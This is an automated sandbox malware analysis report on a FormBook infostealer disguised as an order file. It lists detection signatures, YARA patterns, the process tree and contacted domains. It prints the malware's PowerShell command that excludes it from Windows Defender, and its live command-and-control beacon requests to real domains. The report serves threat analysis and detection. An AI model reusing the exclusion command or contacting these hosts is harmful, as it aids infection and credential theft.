Windows Analysis Report
Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Overview

General Information

Sample name: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Analysis ID: 1467083
MD5: 7c33fb31e0b8302eba116a02e649200b
SHA1: b8cf4b26acf2cfb9f48ccc49a05b308425cbbd07
SHA256: b250139ddfe1f4e0849357b17563dcd09d2dc82f69730c7e5e3797148b47ce16
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe (PID: 2136 cmdline: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe" MD5: 7C33FB31E0B8302EBA116A02E649200B)
    • powershell.exe (PID: 1432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe (PID: 2012 cmdline: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe" MD5: 7C33FB31E0B8302EBA116A02E649200B)
      • EUSOiCcoIEEJJ.exe (PID: 2084 cmdline: "C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • compact.exe (PID: 5644 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)
          • EUSOiCcoIEEJJ.exe (PID: 6800 cmdline: "C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x177f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ae20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1444f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2d3c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x169f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x177f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ParentImage: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ParentProcessId: 2136, ParentProcessName: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ProcessId: 1432, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ParentImage: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ParentProcessId: 2136, ParentProcessName: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ProcessId: 1432, ProcessName: powershell.exe
            No Snort rule has matched

            AV Detection

            Source: http://www.architect-usschool.com/s24g/ | Avira URL Cloud: Label: malware
            Source: http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD | Avira URL Cloud: Label: malware
            Source: http://www.architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= | Avira URL Cloud: Label: malware
            Source: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | Avira URL Cloud: Label: malware
            Source: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | Avira URL Cloud: Label: malware
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | ReversingLabs: Detection: 23%
            Source: Yara match | File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | Joe Sandbox ML: detected
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: compact.pdbGCTL source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EUSOiCcoIEEJJ.exe, 00000009.00000002.4564033459.000000000064E000.00000002.00000001.01000000.0000000C.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4565010474.000000000064E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: CAhp.pdbSHA256 source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Binary string: compact.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CAhp.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: C:\Windows\SysWOW64\compact.exe | Code function: 10_2_02E2C170 FindFirstFileW,FindNextFileW,FindClose | 10_2_02E2C170
            Source: C:\Windows\SysWOW64\compact.exe | Code function: 4x nop then xor eax, eax | 10_2_02E196F0
            Source: C:\Windows\SysWOW64\compact.exe | Code function: 4x nop then mov ebx, 00000004h | 10_2_034E053F

            Networking

            Source: DNS query: www.hellokong.xyz
            Source: Joe Sandbox View | IP Address: 64.190.62.22
            Source: Joe Sandbox View | IP Address: 203.161.49.220
            Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /jmiz/?Y6vp=3PLd8j&OdjTHtuX=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fondazionegtech.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mengistiebethlehem.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /oc7s/?Y6vp=3PLd8j&OdjTHtuX=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ad14.funUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.epicbazaarhub.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rz6grmvv.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hellokong.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.architect-usschool.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.easybackpage.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.superunicornpalace.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /rxdf/?OdjTHtuX=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tedjp-x.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.3cubesinterior.inUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /s0j2/?OdjTHtuX=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.artvectorcraft.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hondamechanic.todayUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.fondazionegtech.org
            Source: global trafficDNS traffic detected: DNS query: www.mengistiebethlehem.com
            Source: global trafficDNS traffic detected: DNS query: www.ad14.fun
            Source: global trafficDNS traffic detected: DNS query: www.epicbazaarhub.com
            Source: global trafficDNS traffic detected: DNS query: www.rz6grmvv.shop
            Source: global trafficDNS traffic detected: DNS query: www.hellokong.xyz
            Source: global trafficDNS traffic detected: DNS query: www.architect-usschool.com
            Source: global trafficDNS traffic detected: DNS query: www.easybackpage.net
            Source: global trafficDNS traffic detected: DNS query: www.superunicornpalace.com
            Source: global trafficDNS traffic detected: DNS query: www.tedjp-x.com
            Source: global trafficDNS traffic detected: DNS query: www.3cubesinterior.in
            Source: global trafficDNS traffic detected: DNS query: www.artvectorcraft.store
            Source: global trafficDNS traffic detected: DNS query: www.macklaer.com
            Source: global trafficDNS traffic detected: DNS query: www.hondamechanic.today
            Source: unknownHTTP traffic detected: POST /92z0/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 213Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.mengistiebethlehem.comOrigin: http://www.mengistiebethlehem.comReferer: http://www.mengistiebethlehem.com/92z0/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:19 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:21 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 15:57:32 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 15:57:35 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 15:57:37 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 15:57:40 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 15:57:46 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 15:57:49 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 15:57:51 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 15:57:54 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Date: Wed, 03 Jul 2024 15:58:00 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.20
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                Content-Encoding: gzip
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Date: Wed, 03 Jul 2024 15:58:02 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.20
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
